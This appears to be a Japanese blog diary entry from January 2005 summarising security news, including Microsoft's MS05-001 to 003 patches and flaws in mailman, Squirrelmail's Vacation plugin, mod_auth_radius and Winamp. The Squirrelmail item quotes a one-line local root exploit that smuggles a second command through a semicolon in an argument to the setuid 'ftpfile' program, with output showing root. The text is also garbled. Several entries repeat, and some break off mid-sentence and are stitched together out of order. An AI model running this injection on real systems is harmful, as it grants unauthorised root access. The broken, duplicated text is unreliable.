2005/01/12(水)水曜日ー。(ぁぁ、仕事ばっかり。)
[セキュリティ] 月間Microsoftパッチ配布の日
: HTML ヘルプの脆弱性により、コードが実行される (890175) [緊急]HTML ヘルプの ActiveX コントロールに存在するクロス ドメインの脆弱性を修正するセキュリティ更新プログラムを公開しました。
: カーソルおよびアイコンのフォーマットの処理の脆弱性により、リモートでコードが実行される (891711) [緊急]カーソルおよびアイコンのフォーマット処理に存在する脆弱性を修正するセキュリティ更新プログラムを公開しました。
: インデックス サービスの脆弱性により、リモートでコードが実行される (871250) [重要]インデックス サービス クエリの検証を処理する方法に存在する脆弱性を修正するセキュリティ更新プログラムを公開しました。関連: * 1月のWindowsアップデート、HTMLヘルプの脆弱性などに対処 (ITmedia)
[セキュリティ] * [USN-59-1] mailman vulnerabilities (Bugtraq)
mailmanのWebインタフェースにクロスサイトスクリプティングの脆弱性。mailmanが自動的に出力するエラーページにHTMLタグを挿入することができる模様です。version 2.1.5-1ubuntu2.2 にアップデートすれば修正されるそうです。[セキュリティ] * Squirrelmail vacation v0.15 local root exploit (Bugtraq)
Squirrelmail の Vacationプラグインに、ローカルユーザが root 権限を取得できる脆弱性が見つかったそうです。これは、setuid root された 'ftpfile' というプログラムの問題によるもので、
Apache の RADIUS認証用モジュール "Mod_auth_radius" にバッファオーバーフローの問題が存在するそうです。これにより、サービスを停止させられてしまう恐れがあるとのこと。"Mod_auth_radius" のすべてのバージョンに問題がある可能性があるそうです。(1.5.4 と 1.5.7 で問題の存在を確認済み。) 修正モジュールはリリースされていないそうです。[雑談] * 振り込め詐欺:「戦車弁償代」と百数十万円、主婦被害
ジョークですかね? 本気ですかね?(^-^;[セキュリティ] * Winamp Unspecified "in_cdda.dll" Buffer Overflow Vulnerability (Secunia)
詳細は不明ですが、version 5.08c よりも古い Winamp には、"in_cdda.dll" にバッファオーバーフローの問題があるそうです。version 5.08c にアップデートすると解決するそうです。関連: * オリジナルアドバイザリ (winamp)
[セキュリティ] * エクスプロイトコードの公開は犯罪か--法的責任を問われる研究者
- MS05-001
: HTML ヘルプの脆弱性により、コードが実行される (890175) [緊急]HTML ヘルプの ActiveX コントロールに存在するクロス ドメインの脆弱性を修正するセキュリティ更新プログラムを公開しました。
- MS05-002
: カーソルおよびアイコンのフォーマットの処理の脆弱性により、リモートでコードが実行される (891711) [緊急]カーソルおよびアイコンのフォーマット処理に存在する脆弱性を修正するセキュリティ更新プログラムを公開しました。
- MS05-003
: インデックス サービスの脆弱性により、リモートでコードが実行される (871250) [重要]インデックス サービス クエリの検証を処理する方法に存在する脆弱性を修正するセキュリティ更新プログラムを公開しました。関連: * 1月のWindowsアップデート、HTMLヘルプの脆弱性などに対処 (ITmedia)
[セキュリティ] * [USN-59-1] mailman vulnerabilities (Bugtraq)
mailmanのWebインタフェースにクロスサイトスクリプティングの脆弱性。mailmanが自動的に出力するエラーページにHTMLタグを挿入することができる模様です。version 2.1.5-1ubuntu2.2 にアップデートすれば修正されるそうです。[セキュリティ] * Squirrelmail vacation v0.15 local root exploit (Bugtraq)
Squirrelmail の Vacationプラグインに、ローカルユーザが root 権限を取得できる脆弱性が見つかったそうです。これは、setuid root された 'ftpfile' というプログラムの問題によるもので、
textile[ljuranic@laptop ljuranic]$ iduid=509(ljuranic) gid=513(ljuranic) groups=513(ljuranic)[ljuranic@laptop ljuranic]$ ftpfile 0 root 0 get 0 "LSS-Security;id"/bin/cp: omitting directory `/root/0'uid=0(root) gid=513(ljuranic) groups=513(ljuranic)[ljuranic@laptop ljuranic]$という超お手軽な方法で root 権限でのコマンドが実行できるようです。(^-^;バージョン0.15以下のバージョンに問題があり、修正プログラムはまだリリースされていないようです。(とりあえず、setuid を解除しておきましょ。)[セキュリティ] * Apache mod_auth_radius remote integer overflow (Bugtraq)
Apache の RADIUS認証用モジュール "Mod_auth_radius" にバッファオーバーフローの問題が存在するそうです。これにより、サービスを停止させられてしまう恐れがあるとのこと。"Mod_auth_radius" のすべてのバージョンに問題がある可能性があるそうです。(1.5.4 と 1.5.7 で問題の存在を確認済み。) 修正モジュールはリリースされていないそうです。[雑談] * 振り込め詐欺:「戦車弁償代」と百数十万円、主婦被害
textile自衛官の息子を名乗る男から「戦車を運転していて、自衛隊の門にぶつけてしまった。弁償代として今日中に百数十万円を振り込んでほしい」と電話があった。主婦は相手の指定した口座に現金百数十万円を振り込んだが、息子が事故を起こした事実はなく、だまされたことが分かった。ぁー、思わず大爆笑してしまいました。(ごめんなさい。)[雑談] * 地球の自転わずかに速まる
textile米航空宇宙局(NASA)は10日、昨年12月26日のスマトラ沖地震の影響で地球の自転速度がわずかに速まり、計算の結果、1日の長さが100万分の2.68秒短くなったとの解析結果を発表した。昨日、このニュースを聞いたときは耳を疑いました。こんなことあるんですねー。[雑談] * [Full-Disclosure] MORE CRITICAL FLAWS IN MS WINDOWS EXPLORER
ジョークですかね? 本気ですかね?(^-^;[セキュリティ] * Winamp Unspecified "in_cdda.dll" Buffer Overflow Vulnerability (Secunia)
詳細は不明ですが、version 5.08c よりも古い Winamp には、"in_cdda.dll" にバッファオーバーフローの問題があるそうです。version 5.08c にアップデートすると解決するそうです。関連: * オリジナルアドバイザリ (winamp)
[セキュリティ] * エクスプロイトコードの公開は犯罪か--法的責任を問われる研究者
textileウイルス対策ソフトのバグを悪用するエクスプロイトコードを公開した研究者が、著作権法違反を理由に収監される可能性がある。なぜ著作権法?!かと思ったら、
textile裁判の中で、裁判官は、公開されたエクスプロイトコードに、改造されたViguardのソースコードが含まれていたことから、Tenaがフランスの著作権法に違反したと結論付けたという。ということですか。(ま、国によって制度が違いますしね。)